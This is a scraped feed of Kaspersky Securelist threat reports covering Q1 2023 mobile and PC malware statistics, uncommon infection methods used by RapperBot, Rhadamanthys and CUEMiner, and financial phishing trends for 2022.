3 Trojan-Banker.AndroidOS.Agent.eq 4.59 5.51 0.92 +1
4 Trojan-Banker.AndroidOS.Agent.ep 3.57 4.40 0.84 +2
5 Trojan-Banker.AndroidOS.Svpeng.q 5.71 4.05 -1.66 -2
6 Trojan-Banker.AndroidOS.Banbra.aa 1.80 3.72 1.92 +6
7 Trojan-Banker.AndroidOS.Agent.la 0.16 3.08 2.92 +85
8 Trojan-Banker.AndroidOS.Banbra.ac 0.57 2.46 1.89 +23
9 Trojan-Banker.AndroidOS.Asacub.ce 3.46 2.17 -1.29 -1
10 Trojan-Banker.AndroidOS.Agent.cf 1.63 1.91 0.28 +5

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Q1 2023 saw a noticeable year-on-year increase in activity by the aforementioned mobile malware Agent.la (3,08%) и Banbra (2,46%), which landed outside the TOP 10 in Q4 2022.

Mobile ransomware Trojans

The number of mobile ransomware programs remained low after dropping in 2022, apparently because the niche had ceased to be as profitable for scammers as it once had been.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q1 2022 — Q1 2023 (download)

TOP 10 mobile ransomware verdicts

Verdict %* Q4 2022 %* Q1 2023 Difference in pp Change in ranking
1 Trojan-Ransom.AndroidOS.Pigetrl.a 54.61 62.22 7.60
2 Trojan-Ransom.AndroidOS.Small.as 5.42 3.65 -1.77
3 Trojan-Ransom.AndroidOS.Rkor.dl 0.00 2.23 2.23
4 Trojan-Ransom.AndroidOS.Congur.y 1.00 1.78 0.78 +19
5 Trojan-Ransom.AndroidOS.Agent.bw 2.19 1.60 -0.59 -1
6 Trojan-Ransom.AndroidOS.Fusob.h 2.04 1.55 -0.49 +1
7 Trojan-Ransom.AndroidOS.Rkor.pac 1.19 1.50 0.32 +9
8 Trojan-Ransom.AndroidOS.Rkor.di 0.62 1.46 0.84 +30
9 Trojan-Ransom.AndroidOS.Rkor.bi 1.62 1.46 -0.16 +2
10 Trojan-Ransom.AndroidOS.Small.o 2.14 1.32 -0.82 -4

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

The distribution of mobile ransomware apps across quarters changed only insignificantly. Pigetrl (62.22%) still accounted for the lion’s share of threats, followed by Small.as (3.65%) and various modifications of Rkor.

]]>
https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/feed/ 0 full large medium thumbnail
IT threat evolution in Q1 2023. Non-mobile statistics https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/ https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/#respond Wed, 07 Jun 2023 08:00:18 +0000 https://kasperskycontenthub.com/securelist/?p=109917

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q1 2023:

  • Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
  • Web Anti-Virus detected 246,912,694 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 106,863 unique users.
  • Ransomware attacks were defeated on the computers of 60,900 unique users.
  • Our File Anti-Virus detected 43,827,839 unique malicious and potentially unwanted objects.

Financial threats

Financial threat statistics

In Q1 2023, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 106,863 unique users.

Number of unique users attacked by financial malware, Q1 2023 (download)

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans or ATM/POS malware worldwide, for each country and territory, we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory.

TOP 10 countries/territories by share of attacked users

Country/territory* %**
1 Turkmenistan 4.7
2 Afghanistan 4.6
3 Paraguay 2.8
4 Tajikistan 2.8
5 Yemen 2.3
6 Sudan 2.3
7 China 2.0
8 Switzerland 2.0
9 Egypt 1.9
10 Venezuela 1.8

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 banking malware families

Name Verdicts %*
1 Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 28.9
2 Emotet Trojan-Banker.Win32.Emotet 19.5
3 Zbot/Zeus Trojan-Banker.Win32.Zbot 18.3
4 Trickster/Trickbot Trojan-Banker.Win32.Trickster 6.5
5 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 5.9
6 Danabot Trojan-Banker.Win32.Danabot 2.3
7 IcedID Trojan-Banker.Win32.IcedID 1.9
8 SpyEyes Trojan-Spy.Win32.SpyEye 1.6
9 Gozi Trojan-Banker.Win32.Gozi 1.1
10 Qbot/Qakbot Trojan-Banker.Win32.Qbot 1.1

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Ransomware programs

Attacks on Linux and VMWare ESXi servers

An increasing number of ransomware families are extending their attack surfaces by adding support for operating systems other than Windows, which they have targeted traditionally. In Q1 2023, we discovered builds from several ransomware families intended for running on Linux and VMWare ESXi servers, namely: ESXiArgs (new family), Nevada (a rebranding of Nokoyawa, which is written in Rust), Royal, IceFire.

Thus, the arsenals of most professional extortion groups today include ransomware builds designed for several platforms, thus maximizing the damage they can cause to their victims.

Progress in combating cybercrime

Europol and the U.S. Department of Justice announced that as a result of a joint operation with the FBI that started in July 2022, the FBI penetrated networks belonging to the Hive group and obtained decryption keys for more than 1,300 victims. The law enforcement agencies also obtained information about 250 Hive affiliates and seized several servers belonging to the group.

The Netherlands Police arrested three individuals suspected of stealing confidential data and extorting €100,000 to €700,000 from each victim company.

Europol announced it had arrested two suspected core members of DoppelPaymer during a joint operation with the FBI and the law enforcement agencies of Germany, Ukraine, and the Netherlands. The team also seized hardware, which the law enforcement agencies will inspect during further investigation.

Conti-based Trojan decrypted

Kaspersky analysts released a utility for decrypting files affected by a Trojan known to researchers as MeowCorp. The malware was compiled from Conti source code, which was published last year. An archive containing the secret keys, 258 in all, was posted on an online forum. We added these, along with data decryption code, to the latest version of RakhniDecryptor.

Most prolific groups

This section looks at ransomware groups that engage in so-called “double extortion”, that is stealing confidential data in addition to encrypting it. Most of these groups target large companies, and many maintain a DLS (data leak site), where they publish a list of organizations they have attacked. The diagram below reflects the most prolific extortion gangs, that is, the ones that added the largest numbers of victims to their DLSs.

Most prolific ransomware gangs. The diagram shows each group’s share of victims out of the total number of victims published on all the groups’ DLSs in Q1 2023 (download)

Number of new modifications

In Q1 2023, we detected nine new ransomware families and 3089 new modifications of the malware of this type.

Number of new ransomware modifications, Q1 2022 — Q1 2023 (download)

Number of users attacked by ransomware Trojans

In Q1 2023, Kaspersky products and technologies protected 60,900 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q1 2023 (download)

Geography of attacked users

TOP 10 countries/territories attacked by ransomware Trojans

Country/territory* %**
1 Yemen 1.50
2 Bangladesh 1.47
3 Taiwan 0.65
4 Mozambique 0.59
5 Pakistan 0.47
6 South Korea 0.42
7 Venezuela 0.32
8 Iraq 0.30
9 Nigeria 0.30
10 Libya 0.26

* Excluded are countries/territories with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 most common families of ransomware Trojans

Name Verdicts* Percentage of attacked users**
1 Magniber Trojan-Ransom.Win64.Magni / Trojan-Ransom.Win32.Magni 15.73
2 WannaCry Trojan-Ransom.Win32.Wanna 12.40
3 (generic verdict) Trojan-Ransom.Win32.Gen 12.27
4 (generic verdict) Trojan-Ransom.Win32.Encoder 8.77
5 (generic verdict) Trojan-Ransom.Win32.Agent 6.65
6 (generic verdict) Trojan-Ransom.Win32.Phny 6.52
7 Stop/Djvu Trojan-Ransom.Win32.Stop 5.90
8 PolyRansom/VirLock Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom 3.74
9 (generic verdict) Trojan-Ransom.Win32.Crypren 3.52
10 (generic verdict) Trojan-Ransom.Win32.CryFile 2.06

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data.
** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans.

Miners

Number of new miner modifications

In Q1 2023, Kaspersky solutions detected 1733 new modifications of miners.

Number of new miner modifications, Q1 2023 (download)

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 403,211 unique users of Kaspersky products worldwide.

Number of unique users attacked by miners, Q1 2023 (download)

Geography of miner attacks

TOP 10 countries/territories attacked by miners

Country/territory* %**
1 Tajikistan 2.87
2 Kazakhstan 2.52
3 Uzbekistan 2.30
4 Kyrgyzstan 2.18
5 Belarus 1.80
6 Venezuela 1.77
7 Ethiopia 1.73
8 Ukraine 1.73
9 Mozambique 1.63
10 Rwanda 1.50

* Excluded are countries/territories with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory.

Vulnerable applications used in cyberattacks

Quarterly highlights

Q1 2023 saw a number of Windows vulnerabilities remediated and published. Some of those were the following:

  • CVE-2023-23397: probably the most high-profile vulnerability, which provoked much online debate and discussion. This Windows vulnerability allows starting automatic authentication on behalf of the user on a host running Outlook.
  • CVE-2023-21674: a vulnerability in the ALPC subsystem that allows a malicious actor to escalate their privileges to system level.
  • CVE-2023-21823: a Windows Graphics Component vulnerability that allows running commands in the system on behalf of the user. This can be reproduced both in Windows desktop versions of Microsoft Office and in mobile (iOS and Android) versions.
  • CVE-2023-23376: a Common Log File System Driver vulnerability that allows escalating privileges to system level.
  • СVE-2023-21768: a vulnerability in the Ancillary Function Driver for WinSock that allows obtaining system privileges.

A Microsoft fix for each of the vulnerabilities is out, and we strongly encourage you to install all the relevant patches.

The main network threats in Q1 2023 were brute-force attacks on MSSQL and RDP services. EternalBlue and EternalRomance remained popular exploits for operating system vulnerabilities. We detected notably large numbers of attacks and scans that targeted log4j-type vulnerabilities (CVE-2021-44228).

Vulnerability statistics

In Q1 2023, Kaspersky products detected more than 300,000 exploitation attempts, most of these using Microsoft Office exploits. Their share was 78.96%, down by just 1 p.p. from the previous quarter. The most-exploited vulnerabilities in that category were the following:

  • CVE-2017-11882 and CVE-2018-0802: Equation Editor vulnerabilities that allow corrupting application memory during formula processing to then run arbitrary code in the system.
  • CVE-2017-0199 that allows using MS Office to load malicious scripts.
  • CVE-2017-8570 that allows loading malicious HTA scripts into the system.

The second most-exploited category were browser vulnerabilities (7.07%), their share growing by 1 p.p. We did not discover any new browser vulnerabilities exploited by malicious actors in the wild. Q2 2023 might bring something new.

Distribution of exploits used by cybercriminals by type of attacked application, Q1 2023 (download)

Android (4.04%) and Java (3.93%) were third and fourth, respectively. Android exploits lost 1 p.p. during the period, whereas the share of Java exploits remained unchanged. The fifth- and sixth-place scores — Adobe Flash (3.49%) and PDF (2.52%) — were very close to the previous quarter’s figures as well.

Attacks on macOS

The first quarter’s high-profile event was a supply-chain attack on the 3CX app, including the macOS version. Hackers were able to embed malicious code into the libffmpeg media processing library to download a payload from their servers.

Worth noting is the MacStealer spy program, also discovered in Q1 2023, which stole cookies from the victim’s browser, as well as account details and cryptowallet passwords.

TOP 20 threats for macOS

Verdict %*
1 AdWare.OSX.Pirrit.ac 11.87
2 AdWare.OSX.Amc.e 8.41
3 AdWare.OSX.Pirrit.j 7.98
4 AdWare.OSX.Agent.ai 7.58
5 Monitor.OSX.HistGrabber.b 6.64
6 AdWare.OSX.Bnodlero.ax 6.12
7 AdWare.OSX.Pirrit.ae 5.77
8 AdWare.OSX.Agent.gen 4.98
9 Hoax.OSX.MacBooster.a 4.76
10 Trojan-Downloader.OSX.Agent.h 4.66
11 AdWare.OSX.Pirrit.o 3.63
12 Backdoor.OSX.Twenbc.g 3.52
13 AdWare.OSX.Bnodlero.bg 3.32
14 AdWare.OSX.Pirrit.aa 3.20
15 Backdoor.OSX.Twenbc.h 3.14
16 AdWare.OSX.Pirrit.gen 3.14
17 Downloader.OSX.InstallCore.ak 2.37
18 Trojan-Downloader.OSX.Lador.a 2.03
19 RiskTool.OSX.Spigot.a 1.92
20 Trojan.OSX.Agent.gen 1.88

* Unique users who encountered this malware as a percentage of all users of Kaspersky security products for macOS who were attacked.

Adware remained the most widespread threat to macOS users. In addition to that, we frequently came across all kinds of system “cleaners” and “optimizers”, many of these containing highly annoying ads or classic scams, where users were offered to buy solutions to problems that did not exist.

Geography of threats for macOS

ТОР 10 countries/territories by share of attacked users

Country/territory* %**
1 Italy 1.43
2 Spain 1.39
3 France 1.37
4 Russian Federation 1.29
5 Mexico 1.20
6 Canada 1.18
7 United States 1.16
8 United Kingdom 0.98
9 Australia 0.87
10 Brazil 0.81

* Excluded from the rankings are countries/territories with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky macOS security products in the country/territory.

Italy (1.43%) and Spain (1.39%) became the leaders by number of attacked users, as France (1.37%), Russia (1.29%) and Canada (1.18%) lost a few percentage points. Overall, the percentage of attacked users in the TOP 10 countries did not change much.

IoT attacks

IoT threat statistics

In Q3 2023, a majority of the devices that attacked Kaspersky honeypots still used the Telnet protocol, but its popularity decreased somewhat from the previous quarter.

Telnet 69.2%
SSH 30.8%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q1 2023

In terms of session numbers, Telnet accounted for the absolute majority.

Telnet 97.8%
SSH 2.2%

Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2023

TOP 10 countries/territories as sources of SSH attacks

Country/territory %* (Q4 2022) %* (Q1 2023)
Taiwan 1.60 12.13
United States 19.11 12.05
South Korea 3.32 7.64
Mainland China 8.45 6.80
Brazil 5.10 5.08
India 6.26 4.45
Germany 6.20 4.00
Vietnam 2.18 3.95
Singapore 6.63 3.63
Russian Federation 3.33 3.36
Other 37.81 36.91

* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where SSH attacks on Kaspersky honeypots originated.

The APAC countries/territories and the U.S. remained the main sources of SSH attacks in Q1 2023.

TOP 10 countries/territories as sources of Telnet attacks

Country/territory %* (Q4 2022) %* (Q1 2023)
Mainland China 46.90 39.92
India 6.61 12.06
Taiwan 6.37 7.51
Brazil 3.31 4.92
Russian Federation 4.53 4.82
United States 4.33 4.30
South Korea 7.39 2.59
Iran 1.05 1.50
Pakistan 1.40 1.41
Kenya 0.06 1.39
Other 18.04 19.58

* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where Telnet attacks on Kaspersky honeypots originated.

Mainland China (39.92%) remained the largest source of Telnet attacks, with India’s (12.06%) and Kenya’s (1.39%) contributions increasing significantly. The share of attacks that originated in South Korea (2.59%) decreased.

TOP 10 threats delivered to IoT devices via Telnet

Verdict %*
1 Trojan-Downloader.Linux.NyaDrop.b 41.39%
2 Backdoor.Linux.Mirai.b 18.82%
3 Backdoor.Linux.Mirai.cw 9.63%
4 Backdoor.Linux.Mirai.ba 6.18%
5 Backdoor.Linux.Gafgyt.a 2.64%
6 Backdoor.Linux.Mirai.fg 2.25%
7 Backdoor.Linux.Mirai.ew 1.89%
8 Trojan-Downloader.Shell.Agent.p 1.77%
9 Backdoor.Linux.Gafgyt.bj 1.24%
10 Trojan-Downloader.Linux.Mirai.d 1.23%

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums.

Countries/territories that serve as sources of web-based attacks: TOP 10

The following statistics show the distribution by country/territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q1 2023, Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. A total of 246,912,694 unique URLs were detected as malicious by Web Anti-Virus.

Distribution of web-attack sources across countries, Q1 2022 (download)

Countries/territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in various countries/territories, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered at least once during the quarter in each country/territory. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in various countries.

Note that these rankings only include attacks by malicious objects that fall under the Malware class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

Country/territory* %**
1 Turkey 16.88
2 Taiwan 16.01
3 Algeria 15.95
4 Palestine 15.30
5 Albania 14.95
6 Yemen 14.94
7 Serbia 14.54
8 Tunisia 14.13
9 South Korea 13.98
10 Libya 13.93
11 Sri Lanka 13.85
12 Greece 13.53
13 Syria 13.51
14 Nepal 13.10
15 Bangladesh 12.92
16 Georgia 12.85
17 Morocco 12.80
18 Moldova 12.73
19 Lithuania 12.61
20 Bahrein 12.39

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country/territory.

On average during the quarter, 9.73% of internet users’ computers worldwide were subjected to at least one Malware-class web attack.

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q1 2023, our File Anti-Virus detected 43,827,839 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country/territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries/territories.

These rankings only include attacks by malicious programs that fall under the Malware class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country/territory* %**
1 Yemen 45.38
2 Turkmenistan 44.68
3 Afghanistan 43.64
4 Tajikistan 42.57
5 Cuba 36.01
6 Burundi 35.20
7 Syria 35.17
8 Bangladesh 35.07
9 Myanmar 34.98
10 Uzbekistan 34.22
11 South Sudan 34.06
12 Rwanda 34.01
13 Algeria 33.94
14 Guinea 33.74
15 Cameroon 33.09
16 Sudan 33.06
17 Chad 33.06
18 Tanzania 32.50
19 Benin 32.42
20 Malawi 31.93

* Excluded are countries/territories with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.

On average worldwide, Malware-class local threats were registered on 15.22% of users’ computers at least once during Q3.

]]>
https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/feed/ 0 full large medium thumbnail
Uncommon infection methods—part 2 https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/ https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/#respond Thu, 13 Apr 2023 08:00:32 +0000 https://kasperskycontenthub.com/securelist/?p=109522

Introduction

Although ransomware is still a hot topic on which we will keep on publishing, we also investigate and publish about other threats. Recently we explored the topic of infection methods, including malvertising and malicious downloads. In this blog post, we provide excerpts from the recent reports that focus on uncommon infection methods and describe the associated malware.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RapperBot: “intelligent brute forcing”

RapperBot, based on Mirai (but with a different C2 command protocol), is a worm infecting IoT devices with the ultimate goal to launch DDoS attacks against non-HTTP targets. We observed the first sample in June 2022, when it was targeting SSH and not Telnet services. The latest version, however, removed the SSH functionality part and now focuses exclusively on Telnet—and with quite some success. In Q4 2022, we noticed 112k RapperBot infection attempts coming from over 2k unique IP addresses.

What sets RapperBot apart from other worms is its “intelligent” way of brute forcing: it checks the prompt and, based on the prompt, it selects the appropriate credentials. This method speeds up the brute forcing process significantly because it doesn’t have to go over a huge list of credentials.

RapperBot then determines the processor architecture and infects the device. The downloading of the actual malware is done via a variety of possible commands (for example, wget, curl, tftp and ftpget). If for some reason these methods don’t work, then a malware downloader is uploaded to the device via the shell “echo” commands.

Rhadamanthys: malvertising on websites and in search engines

Rhadamanthys is a new information stealer first presented on a Russian-speaking cyber criminal forum in September 2022 and offered as a MaaS platform. According to the author, the malware:

  • Is written in C/C++, while the C2 is written in Golang.
  • Is able to do a “stealthy” infection.
  • Is able to steal/gather information on CPU type, screen resolution, supported wallets, and so on.
  • Evades EDR/AV.
  • Has encrypted communication with the C2.

Despite the malware being advertised already in September 2022, we started to detect the first samples at the beginning of 2023. Although Rhadamanthys was using phishing and spam initially as the infection vector, the most recent method is malvertising.

Online advertising platforms offer advertisers the possibility to bid in order to display brief ads in search engines, such as Google, but also websites, mobile apps and more. Both search engine and website-based ad platforms are leveraged by Rhadamanthys. The trick they pull is to display ads representing legitimate applications but in fact containing links to phishing websites. These phishing websites contain fake installers, luring users into downloading and installing the malware.

While analyzing Rhadamanthys, we noticed a strong connection with Hidden Bee miner. Both samples use images to hide the payload inside and both have similar shellcodes for bootstrapping. Additionally, both use “in-memory virtual file systems” and utilize Lua to load plugins and modules.

Comparison between Rhandamanthys's prepare.bin and Hidden Bee's preload modules

Comparison between Rhandamanthys’s “prepare.bin” and Hidden Bee’s “preload” modules

CUEMiner: distribution through BitTorrent and OneDrive

In August 2021, a project was started on GitHub called SilentCryptoMiner, hosting the miner consisting of a downloader and the payload, bot source and the compiled builder, as well as additional software, such as a system watcher. It has been constantly updated, with the latest update going back to October 31 2022. The repository is popular with cybercriminals, as illustrated by the huge number of samples we detected that featured many small changes and were combined with the different URLs and TTPs, making it clear that the malware is used by multiple groups in various ways concurrently.

During our investigation, we noticed two methods of spreading the malware. The first is via trojanized cracked software downloaded via BitTorrent. The other method is via trojanized cracked software that is downloaded from OneDrive sharing networks. How victims are lured into downloading these cracked packages is speculation, because we couldn’t find any direct links. Nevertheless, many crack sites these days do not immediately provide downloads. Instead, they point to Discord server channels for further discussion. This suggests some form of human interaction and social engineering.

The downloader is written in .NET and called CUEMiner. Despite being written in .NET, it is wrapped by a C++ based dropper and it connects to a set of URLs, which is varying from sample to sample, to download the miner and configuration settings. It also performs several checks in order to ensure it is running on bare metal systems, and not on a virtual machine. In case all checks are passed, the malware:

  • Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
  • Fetches configuration details from a hardcoded URL and saves it at different places (for example, c:\logs.uce, %localappdata%\logs.uce).
  • Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look benign.
  • Downloads the miner and watcher.
  • Does a number of other things. The full list you can find in our private report.

The watcher, as the name suggests, monitors the system. If it doesn’t detect any processes that consume lots of system power (for example, games), the miner software is launched. When a heavy process, such as a game, is started, the miner is stopped and only started again when the aforementioned process stops. This is done in order to stay undetected on the system longer.

Conclusion

Open source malware is often used by less skilled cybercriminals. They often lack the required skills and contacts to conduct massive campaigns. Nevertheless, they can be still quite active and effective, as is shown by the huge number of CUEMiner samples we detected. If along their cybercriminal career they gain more skills, such as programming and understanding security better, they often reuse and improve crucial source code parts from open source malware.

Code reuse and rebranding is also used quite often by cybercriminals. There are many ransomware variants that change names over time while mostly containing the same code base. In other cases, cybercriminals re-use parts of the code in new campaigns. For example, Rhadamantys stealer features some code overlaps with the Hidden Bee malware. This suggests involvement of at least one individual in the Rhadamantys campaign who had also been involved in the development of Hidden Bee.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals or have questions about our private reports, please contact crimewareintel@kaspersky.com.

]]>
https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/feed/ 0 full large medium thumbnail
Financial cyberthreats in 2022 https://securelist.com/financial-cyberthreats-in-2022/109219/ https://securelist.com/financial-cyberthreats-in-2022/109219/#respond Wed, 29 Mar 2023 10:00:02 +0000 https://kasperskycontenthub.com/securelist/?p=109219

Financial gain remains the key driver of cybercriminal activity. In the past year, we’ve seen multiple developments in this area – from new attack schemes targeting contactless payments to multiple ransomware groups continuing to emerge and haunt businesses. However, traditional financial threats – such as banking malware and financial phishing, continue to take up a significant share of such financially-motivated cyberattacks.

In 2022, we saw a major upgrade of the notorious Emotet botnet as well as the launch of massive campaigns by Emotet operators throughout the year. For instance, malicious spam campaigns targeting organizations grew 10-fold in April 2022, spreading Qbot and Emotet malware. We also witnessed the emergence of new banking Trojans that hunt for banking credentials, and greater activity on the part of some well-known ones, such as Dtrack, Zbot and Qbot.

The good news is that regardless of these continuous advancements, we’ve witnessed a steady decrease in the number of attacks by banking Trojans. Security solutions integrated into operating systems, two-factor authentication and other verification measures have helped reduce the number of vulnerable users. Additionally, in many markets mobile banking has been pushing out online banking, with more and more convenient and secure banking apps emerging.

Meanwhile, cryptocurrency became a prominent target for those seeking monetary gain. The amount of cryptocurrency-related phishing grew significantly in 2022, and with an endless array of new coins, NFT and other DeFi projects, scammers are continuously duping users. Funds lost via cryptocurrency are hard to track and impossible to return with the help of a regulatory body, as is done with banks and fiat currency, so this trend is likely to continue gaining traction.

Some advanced persistent threat (APT) actors also started tapping into the cryptocurrency market. We previously reported on the Lazarus group, which developed VHD ransomware for the purpose of monetary gain. Now we see that APT actors have also switched to crypto. BlueNoroff developed an elaborate phishing campaign that targeted startups and distributed malware for stealing all crypto in the account tied to the device. They impersonated numerous venture capital groups and investors with considerable success. The NaiveCopy campaign, another example of an advanced threat, targeted stock and cryptocurrency investors in South Korea. And there is more room for further development – hardware wallets and smart contracts could provide a new juicy target for attackers.

This report shines a spotlight on the financial cyberthreat landscape in 2022. It presents a continuation of our previous annual financial threat reports (2018, 2019, 2020, 2021), which provide an overview of the latest trends across the threat landscape. We look at phishing threats commonly encountered by users and companies, as well as the dynamics of various Windows and Android-based financial malware.

Methodology

For this report, we conducted a comprehensive analysis of financial cyber threats in 2022. We focused on malicious software that targets financial services institutions such as online banking, payment systems, e-money services, online stores, and cryptocurrency services. This category of financial malware also includes those seeking unauthorized access to financial organisations’ IT infrastructures.

In addition to financial malware, we also examined phishing activities. This entailed studying the design and distribution of financially themed web pages and emails that impersonate well-known legitimate sites and organizations with the intention of deceiving potential victims into disclosing their private information.

To gain insights into the financial threat landscape, we analyzed data on malicious activities on the devices of Kaspersky security product users. Individuals who use these products voluntarily made their data available to us through Kaspersky Security Network. All data collected from Kaspersky Security Network was anonymized.

We compared the data from 2022 to that of 2021 to identify year-on-year trends in malware development. However, we also included occasional references to earlier years to provide further insights into the evolutionary trends in financial malware.

Key findings

Phishing

  • Financial phishing accounted for 36.3% of all phishing attacks in 2022.
  • E-shop brands were the most popular lure, accounting for 15.56% of attempts to visit phishing sites.
  • PayPal was the almost exclusive focus of phishers in the electronic payment systems category, with 84% of phishing pages targeting the platform.
  • Cryptocurrency phishing saw 40% year-on-year growth in 2022, with 5,040,520 detections compared to 3,596,437 in 2021

PC malware

  • The number of users affected by financial malware continued to decline in 2022, dropping by 14% from 2021.
  • Ramnit and Zbot were the most prevalent malware families, targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.8% of attacks.

Mobile malware

  • The number of Android users attacked with banking malware decreased by around 55% in 2022 compared to the previous year.
  • Bian surpassed Agent as the most active mobile malware family in 2022, with 22% of attacks compared to Agent’s 20%.
  • The geographical distribution of affected users by Android banking malware in 2022 shows that Spain had the highest percentage of targeted users with 1.96%, followed by Saudi Arabia with 1.11% and Australia with 1.09%.

Financial phishing

Phishing continues to be one of the most widespread forms of cybercrime thanks to the low entry threshold and its effectiveness. As we covered previously, cybercriminals can launch phishing campaigns with minimal effort by purchasing ready-made phishing kits.

Phishing is typically built around a classic scheme: first create a website, then craft emails or notifications that mimic real organizations and prompt users to follow a link to the site, share their personal or payment information, or download a program disguised as malware. Phishers mimic every type of organization, including banks, government services, retail and entertainment, as long as the service has a strong user base.

Financial services in particular are of high interest to phishers due to the direct connection to money and payment data. In 2022, 36.3% of all phishing attacks detected by Kaspersky anti-phishing technologies were related to financial phishing.

Distribution of financial phishing cases by type, 2022 (download)

In this report, financial phishing includes banking-specific, but also e-shop and payment systems.

Payment-system phishing refers to phishing pages that mimic well-known payment brands, such as PayPal, MasterCard, Visa, and American Express. E-shops mean online stores and auction sites such as Amazon, Aliexpress, the App Store, and eBay.

In 2022, e-shop brands were the most popular type of lure used by phishers. 15.56% of attempts to visit phishing sites blocked by Kaspersky in 2022 were related to e-shops. If we look at the distribution within financial phishing, e-shops account for 42% of financial phishing cases. E-shops were followed by payment systems (10.39%) and banks (10.39%). Online shopping continues to grow worldwide and, accordingly, the number of brands that are being mimicked by phishers grows with novel schemes appearing on a regular basis.

E-shop brands most frequently exploited in financial phishing schemes, 2022 (download)

In 2022, Apple remains the most exploited brand by scammers, with almost 60% of attacks. The allure of winning the latest model of a new device has proved irresistible to many users, especially during the current global crisis with increasing prices. Not only did we see a spike in these types of scams during major Apple events, but also scammers frequently use Apple to lure victims by offering, for instance, newly released iPhones as prizes for predicting match outcomes during major events like the FIFA World Cup. Meanwhile, Amazon remained in second place with 14.81% of attacks.

In the realm of electronic payment systems, PayPal has traditionally been a popular target for exploitation by scammers. However, recent data indicates that this year it is not only the primary but the near exclusive focus of phishers, with a staggering 84.23% of phishing pages for electronic payment systems targeting PayPal. As a result, the shares of other payment systems have plummeted, with MasterCard International down to 3.75%, Visa Inc. down to 3.10%, and American Express down to 2.02% in 2022.

Payment system brands most frequently exploited in financial phishing schemes, 2022  (download)

Example of a phishing page mimicking the PayPal login page

Example of a phishing page mimicking the PayPal login page

Cryptophishing

In 2022, cryptocurrency phishing rose sufficiently to be included as a separate category. While the total number of attempts to visit such sites makes up just a fraction (0.87%) of all phishing, this category of phishing demonstrated 40% year-on-year growth with 5,040,520 detections in 2022 compared to 3,596,437 in 2021. This boom in cryptophishing may be partially explained by the cryptomarket havoc we saw last year. That said, it is so far unclear whether the trend will continue, and this will significantly depend on the trust users put in cryptocurrency.

Example of a phishing page offering crypto

Example of a phishing page offering crypto

